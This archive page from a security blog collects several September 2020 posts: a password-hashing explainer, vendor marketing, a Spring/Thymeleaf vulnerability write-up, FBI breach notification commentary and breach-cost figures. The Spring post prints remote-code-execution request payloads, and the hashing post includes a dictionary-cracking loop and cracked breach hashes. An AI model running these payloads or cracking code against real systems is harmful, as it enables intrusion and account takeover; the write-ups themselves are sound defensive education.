Daily Archives: September 3, 2020

We Didn’t Encrypt Your Password, We Hashed It. Here’s What That Means:

You've possibly just found out you're in a data breach. The organisation involved may have contacted you and advised your password was exposed but, fortunately, they encrypted it. But you should change it anyway. Huh? Isn't the whole point of encryption that it protects data when exposed to unintended parties? Ah yes, but it wasn't encrypted, it was hashed, and therein lies a key difference:

I see this over and over again and I'm not just on some nerdy pedantic rant; the difference between encryption and hashing is fundamental to how at risk your password is of being recovered and abused after a data breach. I often hear people excusing the mischaracterisation of password storage on the basis of users not understanding what hashing means, but what I'm actually hearing is that breached organisations just aren't able to explain it in a way people understand. So here it is in a single sentence:

A password hash is a representation of your password that can't be reversed, but the original password may still be determined if someone hashes it again and gets the same result.

Let's start to drill deeper in a way that everyday, normal people can understand, beginning with what a password hash actually is. There are two defining attributes relevant to this discussion:

  1. A password hash is one-way: you can hash but you can never un-hash
  2. The hashing procedure is deterministic: you will always get the same output with the same input

This is important for password storage because, point for point, it means the following:

  1. The original password is never stored thus keeping it a secret even from the website you provided it to
  2. By being deterministic, when the password is hashed at registration it will match the same password provided and hashed at login

Take, for example, the following password:

P@ssw0rd

This is a good password because it has lowercase, uppercase, numeric and non-alphanumeric values and is 8 characters long. Yet somehow, your human brain looked at it and decided "no, it's not a good password" because what you're seeing is merely character substitution. The hackers have worked this out too, which is why arbitrary composition rules on websites are useless. Regardless, here's what the hash of that password looks like:

161ebd7d45089b3446ee4e0d86dbcf92

This hash was created with the MD5 hashing algorithm and is 32 characters long. A shorter password hashed with MD5 is still 32 characters long. This entire blog post hashed with MD5 is still 32 characters long. This helps demonstrate the fundamental difference between hashing and encryption: a hash is a representation of data, whilst encryption is protected data. Encryption can be reversed if you have the key, which is why it's used for everything from protecting the files on your device, to your credit card number if you save it on a website you use, to the contents of this page as it's sent over the internet. In each one of these cases, the data being protected needs to be retrieved in its original format at some point in the future, hence the need for encryption. That's the fundamental difference with passwords: you never need to retrieve the password you provided to a website at registration, you only need to ensure it matches the one you provide at login, hence the use of hashing.
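
To make that concrete, here's a minimal sketch in plain Java of how the hash above can be reproduced, using nothing beyond the standard library (the class and method names are just for illustration):

import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

public class Md5Demo {

    static String md5Hex(String input) throws Exception {
        byte[] digest = MessageDigest.getInstance("MD5")
                .digest(input.getBytes(StandardCharsets.UTF_8));
        StringBuilder hex = new StringBuilder();
        for (byte b : digest) {
            hex.append(String.format("%02x", b & 0xff));
        }
        return hex.toString();
    }

    public static void main(String[] args) throws Exception {
        // Deterministic: this should print the same 32-character hash shown above,
        // 161ebd7d45089b3446ee4e0d86dbcf92, every single time it runs.
        System.out.println(md5Hex("P@ssw0rd"));

        // Fixed length: a much longer input still produces a 32-character hash.
        System.out.println(md5Hex("an entire blog post's worth of text..."));
    }
}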

So, where does hashing go wrong and why do websites still ask you to change your password when hashes are exposed? Here's an easy demo - let's just Google the hash from above:

And here we have a whole bunch of websites that match the original password with the hashed version. This is where the deterministic nature of hashes becomes a weakness rather than a strength because once the hash and the plain text version are matched to each other, you've now got a handy little searchable index. Another way of thinking about this is that password hashes are too predictable, so what do we do? Add randomness, which brings us to salt.

Imagine if, instead of just hashing the word "P@ssw0rd", we added another dozen characters to it first - totally random characters - and then we hashed it. Someone else comes along and uses the same password and they get their own salt (which means their own collection of totally random characters) which gets added to the password then hashed. Even with the same password, when combined with a unique salt the resultant hash will, itself, also be unique. So long as the same salt used at registration is added to your password at login (and yes, this means storing the salt alongside the hash in a database somewhere), the process can be repeated and the website can confirm whether the password is correct.
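
To sketch that in code (illustration only; as discussed below, a bare hash like this is still far too fast for real password storage), here's salting with standard-library Java, where the class and helper names are hypothetical:

import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;

public class SaltedHashDemo {

    // Hash the salt and password together; same salt + same password = same hash.
    static String hash(byte[] salt, String password) throws Exception {
        MessageDigest sha256 = MessageDigest.getInstance("SHA-256");
        sha256.update(salt);
        byte[] digest = sha256.digest(password.getBytes(StandardCharsets.UTF_8));
        StringBuilder hex = new StringBuilder();
        for (byte b : digest) {
            hex.append(String.format("%02x", b & 0xff));
        }
        return hex.toString();
    }

    public static void main(String[] args) throws Exception {
        // A unique, random salt is generated for each user at registration
        // (the "dozen totally random characters" mentioned above).
        byte[] salt = new byte[12];
        new SecureRandom().nextBytes(salt);

        // Both the salt and the resulting hash get stored in the database.
        String storedHash = hash(salt, "P@ssw0rd");
        System.out.println("salt: " + Base64.getEncoder().encodeToString(salt));
        System.out.println("hash: " + storedHash);

        // At login, the stored salt is added to the supplied password again;
        // a matching hash confirms the password without ever storing it.
        System.out.println(hash(salt, "P@ssw0rd").equals(storedHash)); // true
    }
}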

Problem is, if someone has all the data out of a database, Wattpad-style, can't they just reproduce the salting and hashing process? I mean, you've got the salt and the hash sitting right there, so what's to stop someone from taking a great big list of passwords, picking a salt from the database, adding it to each password, hashing it and seeing if it matches the one from the breach? The only thing hampering this effort is time; how long would it take to hash that big list of passwords for one user's record from the database? How long for, in Wattpad's case, more than a quarter of a billion users? That all depends on the hashing algorithm that's been chosen. Old, antiquated hashing algorithms that were never really designed for password storage in the first place can be calculated at a rate of tens of billions per second on consumer-grade hardware. Yes, that's "billion" with a "b" for bravo and, for the more technical folks, that's where you're at with MD5 or SHA-1. How long is a hashed password going to remain uncracked at that rate of guesses? Usually, not very long.
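
In code, that cracking effort is nothing more than a loop. Here's a sketch building on the hypothetical SaltedHashDemo.hash helper from the previous snippet (assumed to be in the same package), with a toy candidate list standing in for the billions of previously breached passwords an attacker would really use:

import java.nio.charset.StandardCharsets;

public class DictionaryAttackDemo {

    public static void main(String[] args) throws Exception {
        // Stand-ins for the values an attacker would read from one breached record:
        byte[] leakedSalt = "0123456789ab".getBytes(StandardCharsets.UTF_8); // hypothetical salt
        String leakedHash = SaltedHashDemo.hash(leakedSalt, "P@ssw0rd");     // hypothetical hash

        String[] candidates = { "123456", "iloveyou", "wattpad", "P@ssw0rd" };

        // Add the salt to each candidate, hash it, and compare with the leaked hash.
        for (String guess : candidates) {
            if (SaltedHashDemo.hash(leakedSalt, guess).equals(leakedHash)) {
                System.out.println("Cracked: " + guess);
                break;
            }
        }
    }
}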

Going back to the example in the tweet at the start of this blog post, Wattpad didn't encrypt their customers' passwords, they hashed them. With bcrypt. This is a hashing algorithm designed for storing passwords and what really sets it apart from the aforementioned ones is that it's slow. I mean really slow, like it takes tens of millions of times longer to create the hash. You don't notice this as a customer when you're registering on the site or logging on because it's still only a fraction of a second to calculate a hash of your password, but for someone attempting to crack your password by hashing different possible examples and comparing them to the one in Wattpad, it makes life way harder. But not impossible...
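
To get a feel for that difference in speed, here's a rough sketch using a bcrypt implementation for Java; I'm assuming Spring Security's spring-security-crypto module here purely as an example, since the post doesn't say which library Wattpad uses:

import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;

public class BcryptDemo {

    public static void main(String[] args) {
        // A work factor of 10, the same cost that appears in the $2y$10$ hashes
        // shown later in this post; each increment roughly doubles the time taken.
        BCryptPasswordEncoder encoder = new BCryptPasswordEncoder(10);

        long start = System.nanoTime();
        String hash = encoder.encode("P@ssw0rd"); // salt is generated and embedded automatically
        long elapsedMs = (System.nanoTime() - start) / 1_000_000;

        // One bcrypt hash takes on the order of tens of milliseconds on typical
        // hardware, versus billions of MD5 or SHA-1 hashes per second.
        System.out.println(hash);
        System.out.println("one hash took ~" + elapsedMs + " ms");
    }
}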

Let me demonstrate: here's the Wattpad registration page:

I was interested in what the password criteria were, so I entered a single character and was told the password must be at least 6 characters. Righto, let's now check complexity requirements:

Will 6 all lowercase characters be allowed? Let's submit the registration form and find out:

Yep 😎

Here's the problem with this and it's all going to bring us back to Wattpad's earlier statement about changing your password: because Wattpad's entire password criteria appears to boil down to "just make sure you have 6 or more characters", people are able to register using passwords like the one above. That particular password - "passwo" - appears in Have I Been Pwned's Pwned Passwords service 3,649 times:

It's a very poor password not because of a lack of numbers, uppercase or non-alphanumeric characters (I could easily make a very strong password that's all lowercase), but because of its predictability and prevalence.

Armed with the knowledge that Wattpad allows very simple passwords, I took a small list of the most common ones that were 6 characters or longer and checked them against a sample of their bcrypt hashes. Let's consider a bcrypt hash like this, for example:

$2y$10$5sqOeY.NDcW8vkr47BIG..PeSddwTT/Z8z0MwvF/92NSSh3UsxA.u

The plain text password that generated that hash is "iloveyou". That's in Pwned Passwords 1.6M times and I would argue it's a rather risky one to allow. But because Wattpad's password criteria is so weak, someone (probably many people) used that password and it was easily cracked.

How about this one:

$2y$10$1Gs7jtaGKJjX/7A1GqE2E.0r94/FnKphjp8dyhOVB0jZXirrkfNZW

The plain text version of that one is... wait for it... "wattpad"! These are easy to verify yourself by using an online tool like bcrypt-generator.com that checks a given password against a given hash.
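
If you'd rather not paste a hash into a website, the same check can be done locally with any bcrypt library that understands the $2y$ variant; as one example (an assumption on my part, not how Wattpad or bcrypt-generator.com do it), Spring Security's BCryptPasswordEncoder:

import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;

public class VerifyLeakedHash {

    public static void main(String[] args) {
        String leakedHash = "$2y$10$1Gs7jtaGKJjX/7A1GqE2E.0r94/FnKphjp8dyhOVB0jZXirrkfNZW";

        // matches() re-hashes the candidate password with the salt embedded in the
        // stored hash and compares the result; if "wattpad" really is the plain text
        // behind this hash, as described above, this prints true.
        System.out.println(new BCryptPasswordEncoder().matches("wattpad", leakedHash));
    }
}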

This is why Wattpad recommends changing passwords - because they can be cracked even when a good password hashing algorithm is used. They can't be unencrypted because they weren't encrypted in the first place. If they had been encrypted and there was genuine concern they could be decrypted, that would imply a key compromise, in which case all passwords would be immediately decrypted.

So there's your human-readable version of what password hashing is. I'll leave you again with the quote from above that I'd far prefer to see in disclosure notices and, ideally, a link through to this blog post too, so people have accurate information on which to make informed decisions:

A password hash is a representation of your password that can't be reversed, but the original password may still be determined if someone hashes it again and gets the same result.

Together, We Block and Tackle to Give You Peace of Mind

As a leader in cybersecurity, we at McAfee understand that every aspect of your digital life has potential weak spots that could make you vulnerable to threats and attacks. By incorporating security into everything you do online, you’re better protected from potential threats. To mount your offense, we’ve enlisted a team of partners that puts your security needs first, seamlessly blending our security with their services so you can live a confident life online. We bring our McAfee security teams together with industry players like PC & smartphone manufacturers, software & operating system developers, and more to make sure we can keep scoring security wins for you.

PC Partners Sweat the Security So You Don’t Have To

When was the last time you worried about security while you were shopping for a new PC? You were probably checking out the specs, price, and making sure it had all the capabilities you needed for working remotely, distance learning, and maybe a little gaming. And that’s all in addition to the day-to-day productivity, banking, and browsing you do. Like a strong defensive line, HP, Dell, Lenovo, and ASUS work closely with us to make sure that your personal data and devices are secure, especially as you spend more time online than ever before. That’s why so many new PCs are preloaded with a free McAfee® LiveSafe trial to provide integrated protection from malware, viruses, and spyware from day 1 with minimal impact on performance.

McAfee protection goes beyond just antivirus. We help you keep apps and Windows up to date and patched against vulnerabilities, block intruders with our firewall, and help you clean up cookies and temporary files to minimize the digital footprint on your PC.

We build our security directly into the devices consumers rely on for everything from remote yoga to distance learning, so that they know they’ll be safer online, regardless of what their new normal looks like.

Our Defense Is More Mobile Than Ever

Part of a good defense is understanding how the game has changed. We recognize that our customers are using multiple devices to connect online these days. In fact, their primary device may not even be a computer. That’s why we work with mobile providers to ensure customers like you have access to our comprehensive multidevice security options. Devices like mobile phones and tablets allow users to access social media, stream content, and even bank on their terms. For that reason, our mobile protection includes features like VPN, so that you can connect any time, any place safely and use your apps securely.

Retail Partners Make Plug and Play Even Easier

Our online and brick & mortar retail partners are also irreplaceable on the field. We understand that shopping for security can be complicated – even intimidating – when faced with a wall of choices. Whether you’re in-store or browsing online, we’ll work together to address your security needs so that your devices and personal data are protected with the solution that works best for you. Many of our retailers offer additional installation and upgrade support so you can have one less thing to worry about.

Software Partners Help Us Mount a Better Defense

Your web browser is more than a shortcut to the best chocolate chip cookie recipe; it connects you to endless content, information, and communication. Equally important is your operating system, the backbone that powers every app you install, every preference you save, and every vacation destination wallpaper that cycles through. We partner closely with web browsers, operating systems, and other software developers to ensure that our opponents can’t find holes in our defense. Everything that seamlessly works in the background stays that way, helping stop threats and intruders dead in their tracks. Whether it’s routine software updates or color-coded icons that help differentiate safe websites from phishing scams, we’re calling safety plays that keep our customers in the game.

Our Security Sets Teams Up for Success

At McAfee, we work tirelessly to do what we do best: blocking the threats you see, and even the ones you don’t. These days your “digital life” blurs the lines between security, identity, and privacy. So, we go into the dark web to hunt down leaked personal info stolen by identity thieves. We include Secure VPN in all our suites to give you privacy online. It’s these capabilities that strengthen both the offense and defense in our starting lineup of security suites like McAfee® Total Protection and McAfee® LiveSafe.

In short, your protection goes from a few reminders to scan your device to a team of experts helping you stay primed for the playoffs. It’s a roster that includes technology and humans solely devoted to staying ahead of the bad guys, from McAfee Advanced Threat Research (ATR) investigating and reporting, to artificial intelligence and machine learning that strengthens with every threat from every device. In fact, in just the first three months of this year, our labs detected over six threats per second!

Cybercriminals may be taking advantage of this current moment, but together, we can ensure our defense holds strong. After all, defense wins championships.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Together, We Block and Tackle to Give You Peace of Mind appeared first on McAfee Blogs.

Gartner Summit: Balance Risk, Trust, and Opportunity in an Uncertain World

In light of the current pandemic, most organizations will be working remotely for the foreseeable future. But the increase in virtual operations has led to a higher volume of cyberattacks.

Now, more than ever, it's vital that your organization is armed with the industry's best application security (AppSec) solutions. But how do you build and secure technology in an uncertain world? It's a balancing act between risk, trust, and opportunity.

Chris Wysopal, Veracode Co-Founder and CTO, believes that harmony between risk, trust, and opportunity is achieved when an organization shifts security to the beginning of the software development lifecycle (SDLC). By shifting security left and fully integrating it into the developer's processes, your organization can seize opportunity by deploying new, innovative software faster.

Your organization can also seize opportunity by embracing third-party services and technology. But third-party libraries carry their share of risk, so it's important to have software composition analysis integrated into your SDLC. Another tip is to "automate the vendor onboarding process as much as possible" to allow the business to move faster while maintaining acceptable risk.

The final piece of the puzzle is building trust. You need consumers to trust that the software you're providing is safe and that customer data will be protected. Veracode Verified is a three-tier program that enables organizations of all sizes to demonstrate how secure their software or services are to buyers. As organizations achieve the steps laid out in each tier of the Veracode Verified program, they receive a seal to post on their webpage.

To learn more about balancing risk, trust, and opportunity in an uncertain world, visit our virtual booth at the Gartner Security and Risk Management Summit. We will be offering product demos, meetings with executives, like Chris Wysopal, and an opportunity to win a Drinkworks Home Bar by Keurig®.

Spring View Manipulation Vulnerability

In this article, we explain how dangerous unrestricted view name manipulation in the Spring Framework can be. Before doing so, let's look at the simplest Spring application that uses Thymeleaf as a templating engine:

HelloController.java:

@Controller
public class HelloController {

    @GetMapping("/")
    public String index(Model model) {
        model.addAttribute("message", "happy birthday");
        return "welcome";
    }
}

Due to the use of the @Controller and @GetMapping("/") annotations, this method will be called for every HTTP GET request to the root URL ('/'). Apart from the Model it uses to pass data to the view, it takes no request parameters and returns the static string "welcome". The Spring Framework interprets "welcome" as a view name and tries to find the file "resources/templates/welcome.html" in the application resources. If it finds it, it renders the view from the template file and returns it to the user. If the Thymeleaf view engine is in use (the most popular one for Spring), the template may look like this: welcome.html:



<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org">
<head>
    <title>Spring Boot Web Thymeleaf Example</title>
</head>
<body>
    <div th:fragment="main">
        <h3 th:text="${message}"></h3>
    </div>
</body>
</html>

The Thymeleaf engine also supports file layouts. For example, you can specify a fragment in the template by marking an element with a th:fragment="main" attribute (as in the welcome.html above) and then request only this fragment from the view:

@GetMapping("/main")
public String fragment() {
    return "welcome :: main";
}

Thymeleaf is intelligent enough to return only the 'main' div from the welcome view, not the whole document.
From a security perspective, there may be situations where a template name or a fragment name is concatenated with untrusted data. For example, with a request parameter:

@GetMapping("/path")
public String path(@RequestParam String lang) {
    return "user/" + lang + "/welcome"; //template path is tainted
}

@GetMapping("/fragment")
public String fragment(@RequestParam String section) {
    return "welcome :: " + section; //fragment is tainted
}

The first case looks like a potential path traversal vulnerability, but a user is limited to the 'templates' folder on the server and cannot view any files outside it. The obvious exploitation approach would be to find a separate file upload capability and create a new template, but that's a different issue.
Luckily for the bad guys, before loading the template from the filesystem, Spring's ThymeleafView class parses the template name as an expression:

try {
   // By parsing it as a standard expression, we might profit from the expression cache
   fragmentExpression = (FragmentExpression) parser.parseExpression(context, "~{" + viewTemplateName + "}");
}

So, the aforementioned controllers may be exploited not by path traversal, but by expression language injection:

Exploit for /path (should be url-encoded)

GET /path?lang=__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x HTTP/1.1

In this exploit we use the power of expression preprocessing: by surrounding the expression with __${ and }__::.x, we can make sure it is executed by Thymeleaf no matter what prefix or suffix surrounds it.

To summarize, whenever untrusted data ends up in the view name returned from a controller, it can lead to expression language injection and therefore to Remote Code Execution.

Even more magic

In the previous examples, controllers return strings, explicitly telling Spring what view name to use, but that's not always the case. As described in the documentation, for some return types such as void, java.util.Map or org.springframework.ui.Model, the view name is implicitly determined through a RequestToViewNameTranslator.
It means that a controller like this:

@GetMapping("/doc/{document}")
public void getDocument(@PathVariable String document) {
    log.info("Retrieving " + document);
}

may look absolutely innocent at first glance (it does almost nothing), but since Spring does not know what view name to use, it takes one from the request URI. Specifically, DefaultRequestToViewNameTranslator does the following:

/**
 * Translates the request URI of the incoming {@link HttpServletRequest}
 * into the view name based on the configured parameters.
 * @see org.springframework.web.util.UrlPathHelper#getLookupPathForRequest
 * @see #transformPath
 */
@Override
public String getViewName(HttpServletRequest request) {
    String lookupPath = this.urlPathHelper.getLookupPathForRequest(request, HandlerMapping.LOOKUP_PATH);
    return (this.prefix + transformPath(lookupPath) + this.suffix);
}

So it also becomes vulnerable, as the user-controlled data (the URI) flows directly into the view name and is resolved as an expression.

Exploit for /doc (should be url-encoded)

GET /doc/__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x HTTP/1.1

Safe case: ResponseBody

There are also some cases where a controller returns a user-controlled value but is not vulnerable to view name manipulation. For example, when the controller is annotated with @ResponseBody:

@GetMapping("/safe/fragment")
@ResponseBody
public String safeFragment(@RequestParam String section) {
    return "welcome :: " + section; //FP, as @ResponseBody annotation tells Spring to process the return values as body, instead of view name
}

In this case, the Spring Framework does not interpret the return value as a view name, but simply returns the string in the HTTP response. The same applies to @RestController on a class, as it is itself annotated with @ResponseBody.

Safe case: A redirect

@GetMapping("/safe/redirect")
public String redirect(@RequestParam String url) {
    return "redirect:" + url; //CWE-601, as we can control the hostname in redirect
}

When the view name is prefixed with "redirect:", the logic is also different. In this case, Spring no longer uses ThymeleafView but a RedirectView, which does not perform expression evaluation. This example still has an open redirect vulnerability, but it is certainly not as dangerous as RCE via expression evaluation.

Safe case: Response is already processed

@GetMapping("/safe/doc/{document}")
public void getDocument(@PathVariable String document, HttpServletResponse response) {
    log.info("Retrieving " + document);
}

This case is very similar to one of the previous vulnerable examples, but since the controller has HttpServletResponse among its parameters, Spring considers the HTTP response to have been handled already, so view name resolution simply does not happen. This check exists in the ServletResponseMethodArgumentResolver class.

Conclusion

Spring is a framework with a bit of magic: it allows developers to write less code, but sometimes that magic turns black. It's important to understand the situations in which user-controlled data ends up in sensitive variables (such as view names) and to prevent them accordingly, for example by validating such values against a fixed allow-list, as sketched below. Stay safe.
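
As a concrete illustration of that advice (a sketch, not part of the original research), one simple option is to never let free-form user input reach a view name at all, for example by checking it against a fixed allow-list before building the template path. The controller and language list below are hypothetical:

import java.util.Set;

import org.springframework.http.HttpStatus;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.server.ResponseStatusException;

@Controller
public class SafeLanguageController {

    // Hypothetical allow-list; adjust to the languages the application actually ships.
    private static final Set<String> SUPPORTED_LANGUAGES = Set.of("en", "de", "fr");

    @GetMapping("/safe/path")
    public String path(@RequestParam String lang) {
        // Reject anything that is not a known, fixed value before it can reach the view name.
        if (!SUPPORTED_LANGUAGES.contains(lang)) {
            throw new ResponseStatusException(HttpStatus.BAD_REQUEST, "Unsupported language");
        }
        return "user/" + lang + "/welcome"; // the view name no longer carries untrusted data
    }
}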

Credits

This project was co-authored by Michael Stepankin and Giuseppe Trovato at Veracode. The authors would like to thank Aleksei Tiurin from Acunetix for his excellent research on SSTI vulnerabilities in Thymeleaf.

The FBI Intrusion Notification Program

The FBI intrusion notification program is one of the most important developments in cyber security during the last 15 years. 

This program achieved mainstream recognition on 24 March 2014 when Ellen Nakashima reported on it for the Washington Post in her story U.S. notified 3,000 companies in 2013 about cyberattacks.

The story noted the following:

"Federal agents notified more than 3,000 U.S. companies last year that their computer systems had been hacked, White House officials have told industry executives, marking the first time the government has revealed how often it tipped off the private sector to cyberintrusions...

About 2,000 of the notifications were made in person or by phone by the FBI, which has 1,000 people dedicated to cybersecurity investigations among 56 field offices and its headquarters. Some of the notifications were made to the same company for separate intrusions, officials said. Although in-person visits are preferred, resource constraints limit the bureau’s ability to do them all that way, former officials said...

Officials with the Secret Service, an agency of the Department of Homeland Security that investigates financially motivated cybercrimes, said that they notified companies in 590 criminal cases opened last year, officials said. Some cases involved more than one company."

The reason this program is so important is that it shattered the delusion that some executives used to reassure themselves. When the FBI visits your headquarters to tell you that you are compromised, you can't pretend that intrusions are "someone else's problem."

It may be difficult for some readers to appreciate how prevalent this mindset was, from the beginnings of IT to about the year 2010.

I do not know exactly when the FBI began notifying victims, but I believe the mid-2000s is a safe date. I can personally attest to the program around that time.

I was reminded of the importance of this program by Andy Greenberg's new story The FBI Botched Its DNC Hack Warning in 2016—but Says It Won’t Next Time.

I strongly disagree with this "botched" characterization. Andy writes:

"[S]omehow this breach [of the Democratic National Committee] had come as a terrible surprise—despite an FBI agent's warning to [IT staffer Yared] Tamene of potential Russian hacking over a series of phone calls that had begun fully nine months earlier.

The FBI agent's warnings had 'never used alarming language,' Tamene would tell the Senate committee, and never reached higher than the DNC's IT director, who dismissed them after a cursory search of the network for signs of foul play."

As with all intrusions, criminal responsibility lies with the intruder. However, I do not see why the FBI is supposed to carry the blame for how this intrusion unfolded. 

According to investigatory documents and this Crowdstrike blog post on their involvement, at least seven months passed from the time the FBI notified the DNC (sometime in September 2015) and when they contacted Crowdstrike (30 April 2016). That is ridiculous. 

If I received a call from the FBI even hinting at a Russian presence in my network, I would be on the phone with a professional incident response firm right after I briefed the CEO about the call.

I'm glad the FBI continues to improve its victim notification procedures, but it doesn't make much of a difference if the individuals running IT and the organization are negligent, either through incompetence or inaction.

Note: Fixed year typo.

What A Threat Analyst Really Thinks of Intelligence

When I was a threat analyst, too long ago for me to actually put in writing, I remember the thrill of discovery at the apex of the boredom of investigation. We all know the meme.

And over the years, investigation leads became a little more substantial. It would begin in one of a few ways, but the most common began through an alert as a result of SIEM correlation rules firing. In this situation, we already knew for what we were looking… the SIEM had been configured to alert us on regex matches, X followed by Y, and other common logistics often mis-named as “advanced analytics”. As we became more mature, we would ingest Threat Intelligence feeds from third party sources. Eager and enthusiastic about the hunt, we would voraciously search through a deluge of false alarms (yes, the IPS did find a perimeter attack against Lotus Notes, but we had been using MS Exchange for over 5 years) and false positives (no, that’s not Duqu… just someone who cannot remember their AD credentials).

And the idea that these intelligence sources could spur an entirely new mechanic in the SOC, which we affectionately now refer to as Threat Hunting, was incredibly empowering. It allowed us to move beyond what was already analyzed (and most likely missed) by the SIEM and other security control technologies. True, we had to assume that the threat was already present and that the event had already established a foothold in the organization, but it allowed us to begin discovery at enterprise scale for indicators that perhaps we were compromised. I mean, remember we need to know a problem exists before we can manage it. But again, bad threat data (I once received a list of Windows DLLs as IoCs in a fairly large campaign) and overly unimportant threat data (another provider listed hashes associated with polymorphic malware) led us down a rabbit hole we were only too happy to come out of.

So, did all of that threat data guised under the marketing of “Threat Intelligence” really help us uncover threats otherwise acting in the shadows like a thief in the night? Or did it just divert our attentions to activity that was largely uninteresting while the real threats were just another needle in a stack of needles?

In most mature organizations, Threat Intelligence is a critical component to the SecOps strategy. Of course, it is; it must be. How else could you defend against such a copious amount of threats trying to attack from every angle? We have ontological considerations. Which threat actors are targeting my industry vertical or geography? Have I discovered any of the associated campaign indicators? And, most importantly, will my existing controls protect me? None of which could be addressed without a Threat Intelligence capability.

I remember working with a customer who was just beginning to expand their security operations resources, and they were eager and excited to be bringing in Threat Intelligence capabilities. The board was putting pressure on the CISO to increase the scope of accountability for his response organization, and the media was beginning to make mincemeat out of any business which was compromised by threat actors. The pressure was on and the intelligence began to flow in… like a firehose. About a month after it began, we spoke over lunch when he was interrupted at least 3 times for escalations. “What’s going on,” I asked. He told me that he was getting called day and night now about findings for which his team lacked complete context and understanding. Surely, they had more threat data, but if you asked him, that feature did not include “intelligence.”

Threat intelligence is supposed to help you filter the signals from the noise. At some point, without context and understanding, it is likely just more noise.

Consider the Knowledge Hierarchy: Data, Information, Knowledge, and Wisdom.

Intelligence is defined by dictionary.com as “knowledge of an event, circumstance, etc., received or imparted; news; information.” If we think of Threat Intelligence as a form of data feeding your Security Operations with a listing of parts, or atomic elements that in and of themselves serve little in the way of context, the SOC will regularly be forced to be reactive. With millions of indicators being pushed daily in the form of file hashes, names, URLs, IP addresses, domains, and more, this is hardly useful data.

When Data is correlated in the form of context using ontology, such as grouping by specific types of malware, we gain just enough to classify the relationships as information. When we know that certain malware and malware families will exhibit groups of indicators, we can better ready our controls, detection mechanisms, and even incident response efforts and playbooks. But, still, we lack the adequate context to understand if, in general, this malware or family of malware activities will apply to my organization. We still need more context.

So, at this point we form an entire story. It’s nice to know that malware exists and exhibits key behavior, but it’s even better if we know which threat actors tend to use that malware and in what way. These threat actors, like most businesses, operate in structured projects. Those projects, or campaigns, seek a particular outcome. They target specific types of businesses by industry. At the time of writing, COVID-19 has created such a dramatic vacuum in the pharmaceuticals industry that there is a race to create the first vaccine. The “winner” of such a race would reap incredible financial rewards. So, it stands to reason that APT29 (also known as Cozy Bear), which notoriously hacked the DNC before the 2016 US election, would target pharmaceutical R&D firms. Now, KNOWLEDGE of all of this allows one to deduce that if I were a pharmaceutical R&D company, especially one working on a COVID-19 vaccine, I should look at how APT29 typically behaves and ask some very important questions: what procedures do they typically follow, which tactics are typically witnessed and in what order/timing, which techniques are executed by which processes, and so on. If I could answer all of these questions, I could be reactive, proactive, and even prescriptive:

  • Ensure exploit prevention rules exist for .lnk drops
  • McAfee Credential Theft Protection enabled to protect LSASS stack
  • Monitor for PSExec activity and correlate to other APT29 indicators
  • Monitor/Block for access to registry run keys
  • et al.

However, it seems the one instrument lacking in this race to context and understanding is predictability. Surely, we can predict with the knowledge we have whether or not we may be targeted; but isn’t it much more difficult to predict what the outcome of such an attack may be? Operationally, you may have heard of dry runs or table-top exercises. These are effective operational activities required by functions such as Business Continuity and Disaster Recovery. But what if you could take the knowledge you gleaned from others in the industry, combined with the security footprint of your environment today, and address the elephant in the room that every CISO brings up at the onset of “Threat Intelligence”…

Will I be protected?

– Every CISO, Ever

This level of context and understanding is what leads to Wisdom. Do not wait until the threat makes landfall in your organization. My grandfather always said, “A smart [knowledgeable] man learns from his own mistakes, but a wise man learns from everyone else’s.” I think that rings true with SecOps and Threat Intelligence as well. Once we are able to correlate what we know about our industry vertical, threat actors, campaigns, and geo- and socio-political factors with our own organization’s ability to detect and prevent threats we will truly be wise. Thanks, Pop!

Wisdom as it relates to anti-threat research is not necessarily new. The Knowledge Hierarchy has been a model in Computer Science since about 1980. What is new is McAfee’s ability to provide a complete introspective of your stakeholders’ landscape. McAfee has one of the largest Threat Intelligence Data Lakes with over 1 billion collection points; a huge Advanced Threat Research capability responsible for converting data gleaned from the data lake, incident response consultations, and underground investigations into actionable information and knowledge; and one of the largest Cybersecurity pure-play portfolios providing insights into your overall cybersecurity footing. This unique position has paved the way for the creation of MVISION Insights. MVISION Insights provides context in that we have the knowledge of campaigns and actors potentially targeting your vertical. Then, it can alert you when your existing security control configuration is not tuned to prevent such a threat. It then prescribes for you the appropriate configuration changes required to offer such protection.

MVISION Insights allows an organization to immediately answer the question, “Am I protected?” And, if you are not protected it prescribes for your environment appropriate settings which will defend against threat vectors important to you. This methodology of tying together threat data with context of campaign information and the knowledge of your security control configuration allows MVISION Insights to offer a novel perspective on the effectiveness of your security landscape.

When I think back to all of the investigations that led me down the rabbit hole, I wonder what my days would have been filled with had I such a capability. Certainly, there is an element of “fun” in the discovery. I loved the hunt, but I think having the ability to quickly arm myself with the context and understanding of what I was searching for and why I was searching would have accelerated those moments (read hours or days). I’m excited to discuss and demonstrate how McAfee is using MVISION Insights to turn knowledge into wisdom!

To take MVISION Insights for a spin, check out McAfee’s MVISION Insights Preview.

The post What A Threat Analyst Really Thinks of Intelligence appeared first on McAfee Blogs.

The cost of a data breach in 2020

Organisations spend an average of $3.86 million (about £2.9 million) recovering from security incidents, according to Ponemon Institute’s Cost of a Data Breach Report 2020.

That represents a slight decrease on 2019, which Ponemon’s researchers credit to organisations doing a better job strengthening their cyber defences and incident response capabilities.

The report also notes that 52% of data breaches are caused by cyber attacks, and that malware is the costliest form of attack, with organisations spending $4.52 million (about £3.4 million) on average responding to such incidents.

What activities cost organisations money following a data breach?

The report outlines four activities that cost organisations money as they respond to data breaches:

  • Detection and escalation

These are activities that enable organisations to identify when a breach has occurred.

It covers processes such as forensic and investigative activities, assessment and audit services, crisis management and communications to executives and boards.

  • Lost business

These are activities that attempt to minimise the loss of customers, business disruption and revenue losses.

It can include disruption caused by system downtime, the costs associated with customer churn and reputational loss.

  • Notification

These are activities related to the way organisations notify data subjects, regulators and third parties of the data breach.

